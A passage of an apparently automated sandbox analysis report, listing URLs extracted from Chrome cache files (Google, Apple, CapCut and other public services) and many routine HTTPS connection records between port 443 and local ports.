    Source: chromecache_383.2.dr, chromecache_956.2.drString found in binary or memory: https://support.google.com
    Source: chromecache_390.2.dr, chromecache_360.2.drString found in binary or memory: https://support.google.com/
    Source: chromecache_586.2.dr, chromecache_667.2.drString found in binary or memory: https://support.google.com/googleplay/?p=remote_install_error
    Source: chromecache_713.2.dr, chromecache_461.2.drString found in binary or memory: https://support.google.com/googleplay/?p=report_content
    Source: chromecache_697.2.dr, chromecache_447.2.dr, chromecache_363.2.drString found in binary or memory: https://support.google.com/googleplay/answer/10066529
    Source: chromecache_592.2.dr, chromecache_690.2.drString found in binary or memory: https://support.google.com/googleplay/answer/6014972
    Source: chromecache_713.2.dr, chromecache_461.2.drString found in binary or memory: https://support.google.com/googleplay?p=eligibility_requirements
    Source: chromecache_619.2.drString found in binary or memory: https://tagassistant.google.com/
    Source: chromecache_354.2.dr, chromecache_771.2.dr, chromecache_753.2.drString found in binary or memory: https://td.doubleclick.net
    Source: chromecache_586.2.dr, chromecache_667.2.drString found in binary or memory: https://tokenized.play.google.com
    Source: chromecache_672.2.drString found in binary or memory: https://tv.apple.com/search?q=
    Source: chromecache_382.2.drString found in binary or memory: https://twitter.com/AppStore
    Source: chromecache_804.2.dr, chromecache_795.2.drString found in binary or memory: https://uberproxy-pen-redirect.corp.google.com/uberproxy/pen?url=
    Source: chromecache_382.2.drString found in binary or memory: https://vsco.zendesk.com/categories/20094123-VSCO-Cam
    Source: chromecache_605.2.dr, chromecache_782.2.drString found in binary or memory: https://www.aclu.org
    Source: chromecache_382.2.dr, chromecache_672.2.drString found in binary or memory: https://www.apple.com
    Source: chromecache_382.2.dr, chromecache_672.2.drString found in binary or memory: https://www.apple.com/
    Source: chromecache_382.2.drString found in binary or memory: https://www.apple.com/#organization
    Source: chromecache_382.2.drString found in binary or memory: https://www.apple.com/api-www/global-elements/global-header/v1/assets/globalheader.css
    Source: chromecache_672.2.drString found in binary or memory: https://www.apple.com/apple-books/
    Source: chromecache_672.2.drString found in binary or memory: https://www.apple.com/apple-vision-pro/
    Source: chromecache_382.2.drString found in binary or memory: https://www.apple.com/choose-country-region/
    Source: chromecache_382.2.dr, chromecache_672.2.drString found in binary or memory: https://www.apple.com/ios/app-store/
    Source: chromecache_382.2.drString found in binary or memory: https://www.apple.com/itunes/download/
    Source: chromecache_382.2.drString found in binary or memory: https://www.apple.com/legal/
    Source: chromecache_382.2.drString found in binary or memory: https://www.apple.com/legal/privacy/data/en/app-store/
    Source: chromecache_382.2.drString found in binary or memory: https://www.apple.com/legal/privacy/en-ww/
    Source: chromecache_382.2.drString found in binary or memory: https://www.apple.com/legal/privacy/en-ww/cookies/
    Source: chromecache_672.2.drString found in binary or memory: https://www.apple.com/osx/apps/app-store/
    Source: chromecache_382.2.drString found in binary or memory: https://www.apple.com/uk
    Source: chromecache_382.2.drString found in binary or memory: https://www.apple.com/uk/apple-arcade/
    Source: chromecache_382.2.drString found in binary or memory: https://www.apple.com/uk/ios/app-store/
    Source: chromecache_382.2.drString found in binary or memory: https://www.apple.com/uk/legal/internet-services/
    Source: chromecache_382.2.drString found in binary or memory: https://www.apple.com/uk/macos/mojave-preview/#mac-app-store
    Source: chromecache_382.2.drString found in binary or memory: https://www.apple.com/uz/
    Source: chromecache_382.2.drString found in binary or memory: https://www.apple.com/uz/airpods/
    Source: chromecache_382.2.drString found in binary or memory: https://www.apple.com/uz/entertainment/
    Source: chromecache_382.2.drString found in binary or memory: https://www.apple.com/uz/ios/app-store/
    Source: chromecache_382.2.drString found in binary or memory: https://www.apple.com/uz/ipad/
    Source: chromecache_382.2.drString found in binary or memory: https://www.apple.com/uz/iphone/
    Source: chromecache_382.2.drString found in binary or memory: https://www.apple.com/uz/mac/
    Source: chromecache_382.2.drString found in binary or memory: https://www.apple.com/uz/sitemap/
    Source: chromecache_382.2.drString found in binary or memory: https://www.apple.com/uz/tv-home/
    Source: chromecache_382.2.drString found in binary or memory: https://www.apple.com/uz/watch/
    Source: chromecache_382.2.drString found in binary or memory: https://www.capcut.com
    Source: chromecache_382.2.drString found in binary or memory: https://www.capcut.com/clause/privacy-policy
    Source: chromecache_382.2.drString found in binary or memory: https://www.capcut.net/clause/privacy?region=us
    Source: chromecache_382.2.drString found in binary or memory: https://www.capcut.net/clause/user-agreement?region=us
    Source: chromecache_605.2.dr, chromecache_782.2.drString found in binary or memory: https://www.consumerfinance.gov/
    Source: chromecache_605.2.dr, chromecache_782.2.drString found in binary or memory: https://www.eeoc.gov
    Source: chromecache_499.2.drString found in binary or memory: https://www.ftc.go.kr/selectBizOvrCommPop.do?apvPermMgtNo=2022%EA%B3%B5%EC%A0%950001
    Source: chromecache_661.2.drString found in binary or memory: https://www.google-analytics.com/analytics.js
    Source: chromecache_619.2.drString found in binary or memory: https://www.google-analytics.com/debug/bootstrap?id=
    Source: chromecache_619.2.drString found in binary or memory: https://www.google-analytics.com/gtm/js?id=
    Source: chromecache_619.2.drString found in binary or memory: https://www.google.%/ads/ga-audiences
    Source: chromecache_753.2.drString found in binary or memory: https://www.google.com
    Source: chromecache_619.2.drString found in binary or memory: https://www.google.com/ads/ga-audiences
    Source: chromecache_804.2.dr, chromecache_795.2.drString found in binary or memory: https://www.google.com/log?format=json&hasfast=true
    Source: chromecache_382.2.drString found in binary or memory: https://www.google.com/policies/privacy
    Source: chromecache_383.2.dr, chromecache_956.2.drString found in binary or memory: https://www.google.com/recaptcha/api.js?trustedtypes=true&render=$
    Source: chromecache_950.2.dr, chromecache_636.2.drString found in binary or memory: https://www.google.com/recaptcha/api2/
    Source: chromecache_390.2.dr, chromecache_360.2.drString found in binary or memory: https://www.google.com/tools/feedback
    Source: chromecache_771.2.dr, chromecache_753.2.drString found in binary or memory: https://www.googleadservices.com
    Source: chromecache_753.2.drString found in binary or memory: https://www.googletagmanager.com
    Source: chromecache_354.2.dr, chromecache_771.2.drString found in binary or memory: https://www.googletagmanager.com/a?
    Source: chromecache_354.2.dr, chromecache_771.2.drString found in binary or memory: https://www.googletagmanager.com/dclk/ns/v1.js
    Source: chromecache_661.2.drString found in binary or memory: https://www.googletagmanager.com/gtag/js
    Source: chromecache_388.2.dr, chromecache_619.2.dr, chromecache_661.2.drString found in binary or memory: https://www.googletagmanager.com/gtag/js?id=
    Source: chromecache_383.2.dr, chromecache_956.2.drString found in binary or memory: https://www.googletagmanager.com/gtm.js?id=$
    Source: chromecache_354.2.dr, chromecache_771.2.drString found in binary or memory: https://www.googletagmanager.com/static/service_worker/
    Source: chromecache_592.2.dr, chromecache_690.2.drString found in binary or memory: https://www.gstatic.com/android/market_images/web/battlestar_signed_up-275d9e87.png
    Source: chromecache_592.2.dr, chromecache_690.2.drString found in binary or memory: https://www.gstatic.com/android/market_images/web/reviews_not_found.png
    Source: chromecache_383.2.dr, chromecache_956.2.drString found in binary or memory: https://www.gstatic.com/feedback/js/help/prod/service/lazy.min.js
    Source: chromecache_950.2.dr, chromecache_476.2.dr, chromecache_636.2.dr, chromecache_813.2.drString found in binary or memory: https://www.gstatic.com/recaptcha/releases/xds0rzGrktR88uEZ2JUvdgOY/recaptcha__en.js
    Source: chromecache_360.2.drString found in binary or memory: https://www.gstatic.com/uservoice/feedback/client/web/
    Source: chromecache_811.2.dr, chromecache_957.2.drString found in binary or memory: https://www.instagram.com
    Source: chromecache_933.2.dr, chromecache_554.2.drString found in binary or memory: https://www.internalfb.com/intern/invariant/
    Source: chromecache_753.2.drString found in binary or memory: https://www.merchant-center-analytics.goog
    Source: chromecache_382.2.drString found in binary or memory: https://www.photogrid.app/
    Source: chromecache_382.2.drString found in binary or memory: https://www.wikidata.org/wiki/Q368215
    Source: chromecache_382.2.drString found in binary or memory: https://www.youtube.com
    Source: chromecache_586.2.dr, chromecache_667.2.drString found in binary or memory: https://www.youtube.com/embed/$
    Source: chromecache_354.2.dr, chromecache_771.2.drString found in binary or memory: https://www.youtube.com/iframe_api
    Source: chromecache_382.2.drString found in binary or memory: https://www.youtube.com/t/terms_paidservice.
    Source: chromecache_574.2.dr, chromecache_596.2.drString found in binary or memory: https://xp-qa.apple.com
    Source: chromecache_574.2.dr, chromecache_596.2.dr, chromecache_382.2.drString found in binary or memory: https://xp.apple.com
    Source: chromecache_920.2.drString found in binary or memory: https://xp.apple.com/config/1/report
    Source: chromecache_564.2.dr, chromecache_816.2.drString found in binary or memory: https://xp.apple.com/register
    Source: chromecache_635.2.dr, chromecache_600.2.dr, chromecache_920.2.dr, chromecache_664.2.dr, chromecache_539.2.drString found in binary or memory: https://xp.apple.com/report
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
    Source: unknownNetwork traffic detected: HTTP traffic on port 49817 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49982
    Source: unknownNetwork traffic detected: HTTP traffic on port 49932 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50211 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50177 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50257 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50452 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49979
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49978
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49977
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
    Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49976
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49975
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49974
    Source: unknownNetwork traffic detected: HTTP traffic on port 50360 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49973
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49972
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49971
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49970
    Source: unknownNetwork traffic detected: HTTP traffic on port 50417 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50165 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50325 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50004 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50292 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49969
    Source: unknownNetwork traffic detected: HTTP traffic on port 49978 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49964
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49963
    Source: unknownNetwork traffic detected: HTTP traffic on port 50359 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49962
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49961
    Source: unknownNetwork traffic detected: HTTP traffic on port 50189 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50464 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50073 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50303 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50269 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49958
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49956
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49955
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49954
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49953
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49952
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49951
    Source: unknownNetwork traffic detected: HTTP traffic on port 50280 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49944 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50337 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50405 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
    Source: unknownNetwork traffic detected: HTTP traffic on port 50382 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49944
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49943
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
    Source: unknownNetwork traffic detected: HTTP traffic on port 50187 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50462 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50301 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50270 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
    Source: unknownNetwork traffic detected: HTTP traffic on port 50347 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
    Source: unknownNetwork traffic detected: HTTP traffic on port 50335 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
    Source: unknownNetwork traffic detected: HTTP traffic on port 50282 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50247 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50370 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50407 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50155 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49991 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
    Source: unknownNetwork traffic detected: HTTP traffic on port 50313 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
    Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50208 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50429 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49956 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50259 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49993
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49992
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49991
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49990
    Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50199 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50474 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
    Source: unknownNetwork traffic detected: HTTP traffic on port 50369 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49989
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49988
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
    Source: unknownNetwork traffic detected: HTTP traffic on port 50277 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50337
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50336
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50339
    Source: unknownNetwork traffic detected: HTTP traffic on port 50386 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49672 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50338
    Source: unknownNetwork traffic detected: HTTP traffic on port 50392 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50331
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50330
    Source: unknownNetwork traffic detected: HTTP traffic on port 50225 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50332
    Source: unknownNetwork traffic detected: HTTP traffic on port 50466 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50335
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50334
    Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50305 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50106
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50348
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50347
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50107
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50349
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50340
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50342
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50341
    Source: unknownNetwork traffic detected: HTTP traffic on port 50339 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50344
    Source: unknownNetwork traffic detected: HTTP traffic on port 50352 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50243 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50343
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50346
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50345
    Source: unknownNetwork traffic detected: HTTP traffic on port 50289 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49964 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50197 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50117
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50359
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50351
    Source: unknownNetwork traffic detected: HTTP traffic on port 50317 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50350
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50353
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50352
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50355
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50354
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50357
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50356
    Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50360
    Source: unknownNetwork traffic detected: HTTP traffic on port 50175 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50213 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49799
    Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50419 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50369
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
    Source: unknownNetwork traffic detected: HTTP traffic on port 50255 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49952 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
    Source: unknownNetwork traffic detected: HTTP traffic on port 50442 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50364
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50365
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50368
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50367
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50371
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50370
    Source: unknownNetwork traffic detected: HTTP traffic on port 50340 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
    Source: unknownNetwork traffic detected: HTTP traffic on port 50478 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50315 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50350 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50106 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50267 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50410 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49942 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50304
    Source: unknownNetwork traffic detected: HTTP traffic on port 50444 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50303
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50306
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50305
    Source: unknownNetwork traffic detected: HTTP traffic on port 50173 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50308
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50307
    Source: unknownNetwork traffic detected: HTTP traffic on port 49954 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50309
    Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49988 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50201 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50300
    Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50302
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50301
    Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50046 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50141 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50233 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50476 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50315
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50314
    Source: unknownNetwork traffic detected: HTTP traffic on port 50384 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50317
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50316
    Source: unknownNetwork traffic detected: HTTP traffic on port 49976 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50319
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50318
    Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50279 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50311
    Source: unknownNetwork traffic detected: HTTP traffic on port 50394 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50310
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50313
    Source: unknownNetwork traffic detected: HTTP traffic on port 50223 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50312
    Source: unknownNetwork traffic detected: HTTP traffic on port 50454 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50024 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50163 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50349 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50326
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50325
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50328
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50327
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50329
    Source: unknownNetwork traffic detected: HTTP traffic on port 50245 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50320
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50322
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50321
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50324
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50323
    Source: unknownNetwork traffic detected: HTTP traffic on port 50372 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50290 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50432 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50185 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50409 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50327 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50296
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50295
    Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50298
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50297
    Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50299
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50059
